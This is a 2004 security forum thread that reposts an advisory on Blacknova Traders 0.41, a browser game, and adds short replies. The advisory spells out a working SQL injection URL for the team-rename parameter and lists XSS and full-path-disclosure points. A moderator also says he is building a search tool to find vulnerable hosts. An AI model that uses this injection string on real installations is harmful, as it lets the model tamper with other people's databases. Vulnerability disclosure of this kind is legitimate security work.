 |
|
 |
 |
Menu |
 |
|
 Home |
| |
|
 Discussions |
| |
|
 Tools |
| |
|
| Affiliates |
| |
|
 Content |
| |
|
 Info |
| | |
|
|
|
|
|
User Info |
|
 Membership:
 Latest: MichaelSnaRe
 New Today: 0
 New Yesterday: 0
 Overall: 9144
 People Online:
 Visitors: 73
 Members: 0
 Total: 73
|
|
|
|
|
|
Full disclosure |
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
|
Blacknova Traders 0.41 SQL+XSS |
|
 Posted: Sun Nov 14, 2004 3:20 am |
 |
|
| g0df4th3r |
| Advanced user |
 |
|
| Joined: Sep 22, 2004 |
| Posts: 52 |
| Location: LV |
|
|
 |
|
 |
|
| Code: |
[NETSEC SA#001]
Multiple Vulneranilities in Blacknova Traders
=====================
Author: Digital-X
www: http://netsec.lv
Date: 22.10.2004
=====================
*Affected Software:
'Blacknova traders' is open-source browser-based space strategy game. Just google if you want to play it wink.gif
Home: http://sourceforge.net/projects/blacknova
*Vulnerabilites:
1.Be sure that you are registred user and then make new team (Alliance)
2.Click [Edit] to edit settings for your alliance.
3.Copy URL: i.e(http://www/blacknova/teams.php?teamwhat=15&whichteam=20)
4.Now the SQL Injection - add this at the end of the URL:
/teams.php?teamwhat=15&whichteam=20&swordfish=&update=true&teamname=h4x0r5',%20description=''%20WHERE%20id=20%20/*&description=
If its ok, you will see mesage: Alliance h4x0r5', description='' WHERE id=20 /* has been renamed. smile.gif
Basically you can do a SQL injection in "teamname" parameter
*XSS
http://www/blacknova/news.php?startdate=[XSS] (maybe SQL inject. too)
http://www/blacknova/mines.php?op=[XSS]
*Full Path Disclosure:
http://www/blacknova/news.php?startdate=1'
Greetz: waraxe, icenix,slimjim100,argentino,y3dips!
|
|
|
|
|
|
|
|
|
|
| Posted: Sun Nov 14, 2004 7:00 pm |
|
|
| LINUX |
| Moderator |
|
|
| Joined: May 24, 2004 |
| Posts: 404 |
| Location: Caiman |
|
|
|
|
|
|
exellent work men .
 i develop api for google search vuln host |
|
|
|
|
|
Re: Blacknova Traders 0.41 SQL+XSS |
|
| Posted: Fri Feb 25, 2005 2:49 pm |
|
|
| y3dips |
| Valuable expert |
 |
|
| Joined: Feb 25, 2005 |
| Posts: 281 |
| Location: Indonesia |
|
|
|
|
|
|
| g0df4th3r wrote: | | Code: |
[NETSEC SA#001]
Multiple Vulneranilities in Blacknova Traders
=====================
Author: Digital-X
www: http://netsec.lv
Date: 22.10.2004
=====================
*Affected Software:
'Blacknova traders' is open-source browser-based space strategy game. Just google if you want to play it wink.gif
Home: http://sourceforge.net/projects/blacknova
*Vulnerabilites:
1.Be sure that you are registred user and then make new team (Alliance)
2.Click [Edit] to edit settings for your alliance.
3.Copy URL: i.e(http://www/blacknova/teams.php?teamwhat=15&whichteam=20)
4.Now the SQL Injection - add this at the end of the URL:
/teams.php?teamwhat=15&whichteam=20&swordfish=&update=true&teamname=h4x0r5',%20description=''%20WHERE%20id=20%20/*&description=
If its ok, you will see mesage: Alliance h4x0r5', description='' WHERE id=20 /* has been renamed. smile.gif
Basically you can do a SQL injection in "teamname" parameter
*XSS
http://www/blacknova/news.php?startdate=[XSS] (maybe SQL inject. too)
http://www/blacknova/mines.php?op=[XSS]
*Full Path Disclosure:
http://www/blacknova/news.php?startdate=1'
Greetz: waraxe, icenix,slimjim100,argentino,y3dips!
|
|
wew,
maybe im to late posting a reply to this thread , im just suprising that u wrote my name on your last sentence ..
i found it on google 
by this post, i join this community , n nice to know u all
sorry i post an OOT |
|
_________________
IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
|
www.waraxe.us Forum Index -> All other software
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|
